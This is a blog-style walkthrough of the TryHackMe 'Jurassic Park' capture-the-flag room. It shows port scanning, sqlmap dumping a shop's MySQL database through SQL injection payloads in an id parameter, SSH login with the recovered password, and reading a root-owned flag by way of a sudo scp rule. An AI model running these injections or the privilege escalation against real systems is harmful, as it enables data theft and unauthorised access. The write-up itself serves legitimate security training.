TryHackMe: Jurassic Park CTF

TryHackMe: Jurassic Park by tryhackme

Introduction

This medium-hard task will require you to enumerate the web application, get credentials to the server and find 5 flags hidden around the file system. Oh, Dennis Nedry has helped us to secure the app too...

You're also going to want to turn up your devices volume (firefox is recommended). So, deploy the VM and get hacking..

Please connect to our network before deploying the machine.

Enumeration

Let's add to /etc/hosts and run our rustscan

╰─⠠⠵ rustscan -a jurassicpark --ulimit 10000 -- -sC -sV -oA jurassicpark -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/tony/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.128.117:22
Open 10.10.128.117:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-05 14:23 BST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
Initiating Ping Scan at 14:23
Scanning 10.10.128.117 [2 ports]
Completed Ping Scan at 14:23, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 14:23
Scanning jurassicpark (10.10.128.117) [2 ports]
Discovered open port 22/tcp on 10.10.128.117
Discovered open port 80/tcp on 10.10.128.117
Completed Connect Scan at 14:23, 0.03s elapsed (2 total ports)
Initiating Service scan at 14:23
Scanning 2 services on jurassicpark (10.10.128.117)
Completed Service scan at 14:23, 6.08s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.128.117.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 1.25s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.13s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
Nmap scan report for jurassicpark (10.10.128.117)
Host is up, received syn-ack (0.031s latency).
Scanned at 2021-04-05 14:23:48 BST for 8s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:28:1c:ac:b5:8b:b7:92:1e:55:55:05:b3:36:2d:7f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwYoZ4gqy9T1lTU8706cjCZIC7zphOKGnmtwCXX4eVeBgrah3FA7R5BJMAAXfN7de4DGsz07Etl/zq7M2a/hpuyn8aKfqOV/p+u7WzEDRT1OGIu1QQ3EUkBV1WRxUERYZI2NwYf6RElAOX3oC4cxti6T+M2/h4iMrWF7bmiDsRIjDYimBJxa7w1BY+pRtQbF73YQw26H01yWdqUTj4Rsk8jl0Agmqu0bHSFiY8rQAH9oNQiZZELjfcaqMQhBn58dRELovcP68IOXKYhFyFmhbf+4gm3ArfLD/7dnHdUl5KkW3sQ2Hwqb+iVZzuA+VBelrBkf8VDdVj5dyEjuwegxSR
|   256 0d:aa:49:6a:74:41:b2:52:cb:11:52:a3:50:db:f1:67 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGdtKIl/IVtUx1Z1bddIlwz5HG2XjXcUxZFLULXqkJIjvRn9pMCp3nHzZAwL1dxqDhOupMacnSyKcvjzIAU0aY0=
|   256 b8:28:2e:de:d0:51:35:12:df:8c:c1:77:13:65:5c:9a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO55AArg7Xen1m0AeoYRClqkyUqJovHesgPQDYbdzZvr
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 019A6B943FC3AAA6D09FBA3C139A909A
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jarassic Park
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:23
Completed NSE at 14:23, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.11 seconds

22/ssh

No credentials yet so let's move on......

80/http

robots.txt: Wubbalubbadubdub

There is hidden video in the source code...

    <!-- <video src="assets/theme.mp3" autoplay> -->

Over at #/shop.php we get

What is the SQL database called which is serving the shop information?

From the /shop.php page open developer tools and then click a Buy... link. Once on the new page right click the request > copy > copy request headers

Paste this into a new file and use the -r argument with sqlmap

GET /item.php?id=3 HTTP/1.1
Host: jurassicpark.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://jurassicpark.local/shop.php
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1

Now let's run our sqlmap command to deump everything

─⠠⠵ sqlmap -r shop.request -dbms=mysql --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.4#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:37:32 /2021-04-05/

[14:37:32] [INFO] parsing HTTP request from 'shop.request'
[14:37:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 3636=3636

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=3 AND (SELECT 7077 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(7077=7077,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1675 FROM (SELECT(SLEEP(5)))NQom)
---
[14:37:32] [INFO] testing MySQL
[14:37:32] [INFO] confirming MySQL
[14:37:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[14:37:32] [INFO] fetching database names
[14:37:32] [INFO] resumed: 'information_schema'
[14:37:32] [INFO] resumed: 'mysql'
[14:37:32] [INFO] resumed: '[REDACTED]'
[14:37:32] [INFO] resumed: 'performance_schema'
[14:37:32] [INFO] resumed: 'sys'
available databases [5]:
[*] information_schema
[*] mysql
[*] park
[*] performance_schema
[*] sys

[14:37:32] [INFO] fetched data logged to text files under '/home/tony/.sqlmap/output/jurassicpark.local'
[14:37:32] [WARNING] you haven't updated sqlmap for more than 367 days!!!

[*] ending @ 14:37:32 /2021-04-05/

ANswer: [REDACTED]

How many columns does the table have?

Let's run our sqlmap command

╰─⠠⠵ sqlmap -r shop.request -dbms=mysql --tables -D park
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:41:52 /2021-04-05/

[14:41:52] [INFO] parsing HTTP request from 'shop.request'
[14:41:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 3636=3636

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=3 AND (SELECT 7077 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(7077=7077,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1675 FROM (SELECT(SLEEP(5)))NQom)
---
[14:41:52] [INFO] testing MySQL
[14:41:52] [INFO] confirming MySQL
[14:41:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[14:41:52] [INFO] fetching tables for database: 'park'
[14:41:52] [INFO] retrieved: 'items'
[14:41:52] [INFO] retrieved: 'users'
Database: park
[2 tables]
+-------+
| items |
| users |
+-------+

[14:41:52] [INFO] fetched data logged to text files under '/home/tony/.sqlmap/output/jurassicpark.local'
[14:41:52] [WARNING] you haven't updated sqlmap for more than 367 days!!!

[*] ending @ 14:41:52 /2021-04-05/

Ok so we can assume that items is serving the shop so let's dump this table.

╰─⠠⠵ sqlmap -r shop.request -dbms=mysql -D park -T items --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.4#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:43:03 /2021-04-05/

[14:43:03] [INFO] parsing HTTP request from 'shop.request'
[14:43:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 3636=3636

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=3 AND (SELECT 7077 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(7077=7077,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1675 FROM (SELECT(SLEEP(5)))NQom)
---
[14:43:04] [INFO] testing MySQL
[14:43:04] [INFO] confirming MySQL
[14:43:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[14:43:04] [INFO] fetching columns for table 'items' in database 'park'
[14:43:04] [INFO] retrieved: 'id'
[14:43:04] [INFO] retrieved: 'int(11) unsigned'
[14:43:04] [INFO] retrieved: 'package'
[14:43:04] [INFO] retrieved: 'varchar(11)'
[14:43:04] [INFO] retrieved: 'price'
[14:43:04] [INFO] retrieved: 'int(11)'
[14:43:04] [INFO] retrieved: 'information'
[14:43:04] [INFO] retrieved: 'char(250)'
[14:43:04] [INFO] retrieved: 'sold'
[14:43:04] [INFO] retrieved: 'int(11)'
[14:43:04] [INFO] fetching entries for table 'items' in database 'park'
[14:43:04] [INFO] retrieved: '1'
[14:43:05] [INFO] retrieved: 'Childen under 5 can attend free of charge and will be eaten for free. This package includes a dinosaur lunch, tour around the park AND a F...
[14:43:05] [INFO] retrieved: 'Gold'
[14:43:05] [INFO] retrieved: '500000'
[14:43:05] [INFO] retrieved: '4'
[14:43:05] [INFO] retrieved: '2'
[14:43:05] [INFO] retrieved: 'Children under 5 can attend free of charge and eat free. This package includes a tour around the park and a dinosaur lunch! Try different ...
[14:43:05] [INFO] retrieved: 'Bronse'
[14:43:05] [INFO] retrieved: '250000'
[14:43:05] [INFO] retrieved: '11'
[14:43:05] [INFO] retrieved: '3'
[14:43:05] [INFO] retrieved: 'Children under 5 can attend for free and eat free. This package will include a basic tour around the park in the brand new automated cars!'
[14:43:05] [INFO] retrieved: 'Basic'
[14:43:05] [INFO] retrieved: '100000'
[14:43:05] [INFO] retrieved: '27'
[14:43:05] [INFO] retrieved: '5'
[14:43:06] [INFO] retrieved: 'Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?'
[14:43:06] [INFO] retrieved: 'Development'
[14:43:06] [INFO] retrieved: '0'
[14:43:06] [INFO] retrieved: '0'
[14:43:06] [INFO] retrieved: '100'
[14:43:06] [INFO] retrieved: 'Nope'
[14:43:06] [INFO] retrieved: '...'
[14:43:06] [INFO] retrieved: '-1'
[14:43:06] [INFO] retrieved: '-1'
Database: park
Table: items
[5 entries]
+------+------+--------+-------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id   | sold | price  | package     | information                                                                                                                                                                            |
+------+------+--------+-------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1    | 4    | 500000 | Gold        | Childen under 5 can attend free of charge and will be eaten for free. This package includes a dinosaur lunch, tour around the park AND a FREE dinosaur egg from a dino of your choice! |
| 2    | 11   | 250000 | Bronse      | Children under 5 can attend free of charge and eat free. This package includes a tour around the park and a dinosaur lunch! Try different dino's and rate the best tasting one!        |
| 3    | 27   | 100000 | Basic       | Children under 5 can attend for free and eat free. This package will include a basic tour around the park in the brand new automated cars!                                             |
| 5    | 0    | 0      | Development | Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?                                                                                         |
| 100  | -1   | -1     | ...         | Nope                                                                                                                                                                                   |
+------+------+--------+-------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

[14:43:06] [INFO] table 'park.items' dumped to CSV file '/home/tony/.sqlmap/output/jurassicpark.local/dump/park/items.csv'
[14:43:06] [INFO] fetched data logged to text files under '/home/tony/.sqlmap/output/jurassicpark.local'
[14:43:06] [WARNING] you haven't updated sqlmap for more than 367 days!!!

[*] ending @ 14:43:06 /2021-04-05/

Answers: [REDACTED]

Whats the system version?

I skipped to the next question which resulted in getting ssh access and then came back to this.

Answer: [REDACTED]

What is dennis' password?

Let's take a look at park.users

╰─⠠⠵ sqlmap -r shop.request -dbms=mysql -D park -T users --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.4#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:49:44 /2021-04-05/

[14:49:44] [INFO] parsing HTTP request from 'shop.request'
[14:49:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3 AND 3636=3636

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=3 AND (SELECT 7077 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(7077=7077,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=3 AND (SELECT 1675 FROM (SELECT(SLEEP(5)))NQom)
---
[14:49:44] [INFO] testing MySQL
[14:49:44] [INFO] confirming MySQL
[14:49:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[14:49:44] [INFO] fetching columns for table 'users' in database 'park'
[14:49:45] [INFO] retrieved: 'id'
[14:49:45] [INFO] retrieved: 'int(11) unsigned'
[14:49:45] [INFO] retrieved: 'username'
[14:49:45] [INFO] retrieved: 'varchar(11)'
[14:49:45] [INFO] retrieved: 'password'
[14:49:45] [INFO] retrieved: 'varchar(11)'
[14:49:45] [INFO] fetching entries for table 'users' in database 'park'
[14:49:45] [INFO] retrieved: '1'
[14:49:45] [INFO] retrieved: '[REDACTED]'
[14:49:45] [INFO] retrieved: '2'
[14:49:45] [INFO] retrieved: '[REDACTED]'
Database: park
Table: users
[2 entries]
+------+----------+------------+
| id   | username | password   |
+------+----------+------------+
| 1    |          | [REDACTED] |
| 2    |          | [REDACTED] |
+------+----------+------------+

[14:49:45] [INFO] table 'park.users' dumped to CSV file '/home/tony/.sqlmap/output/jurassicpark.local/dump/park/users.csv'
[14:49:45] [INFO] fetched data logged to text files under '/home/tony/.sqlmap/output/jurassicpark.local'
[14:49:45] [WARNING] you haven't updated sqlmap for more than 367 days!!!

[*] ending @ 14:49:45 /2021-04-05/

Ok, no usernames but we can try both. So let's try these to ssh to the box.

╰─⠠⠵ ssh dennis@jurassicpark
The authenticity of host 'jurassicpark (10.10.128.117)' can't be established.
ECDSA key fingerprint is SHA256:1kcGE0z+I1Iwi9UZjw+23jHpLB7YypMyMu3UbxVbXRw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'jurassicpark,10.10.128.117' (ECDSA) to the list of known hosts.
dennis@jurassicpark's password: 
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-1072-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

62 packages can be updated.
45 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

dennis@ip-10-10-128-117:~$

Answer: [REDACTED]

Locate and get the first flag contents.

Let's see what is in Dennis' home directory

dennis@ip-10-10-128-117:~$ ls
flag1.txt  test.sh
dennis@ip-10-10-128-117:~$ cat flag1.txt 
Congrats on finding the first flag.. But what about the rest? :O

[REDACTED]

Answer: [REDACTED]

Whats the contents of the second flag?

Let's try find to see if we can locate any other flags

dennis@ip-10-10-128-117:~$ find / -iname "flag*.txt" 2>/dev/null
/home/dennis/flag1.txt
/boot/grub/fonts/flagTwo.txt
dennis@ip-10-10-128-117:~$ cat /boot/grub/fonts/flagTwo.txt
[REDACTED]

Answer: [REDACTED]

Whats the contents of the third flag?

This one took me the longest to find as usually ~/.bash_histroy is linked to /dev/null on most machines and so am in the habit of not checking it.

dennis@ip-10-10-128-117:~$ head .bash_history 
Flag3:[REDACTED]
sudo -l
sudo scp
scp
sudo find
ls
vim test.sh
ls
cd ~
ls

Answer: [REDACTED]

There is no fourth flag.

Ok, just click completed

Whats the contents of the fifth flag?

Question Hint
Enumerate your privileges.

Ok looking at sudo -l

dennis@ip-10-10-128-117:~$ sudo -l
Matching Defaults entries for dennis on ip-10-10-128-117.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dennis may run the following commands on ip-10-10-128-117.eu-west-1.compute.internal:
    (ALL) NOPASSWD: /usr/bin/scp

Looking at test.sh

dennis@ip-10-10-128-117:~$ cat test.sh 
#!/bin/bash
cat /root/flag5.txt

We we can use scp to get the root flag.

dennis@ip-10-10-128-117:~$ sudo /usr/bin/scp /root/flag5.txt .
dennis@ip-10-10-128-117:~$ ls
bash  flag1.txt  flag5.txt  test.sh
dennis@ip-10-10-128-117:~$ cat flag5.txt 
[REDACTED]

Answer: [REDACTED]

Done

A nice little sql and enumeration room. The rating for this room is hard but INHO I do not think it, I think this is an easy room.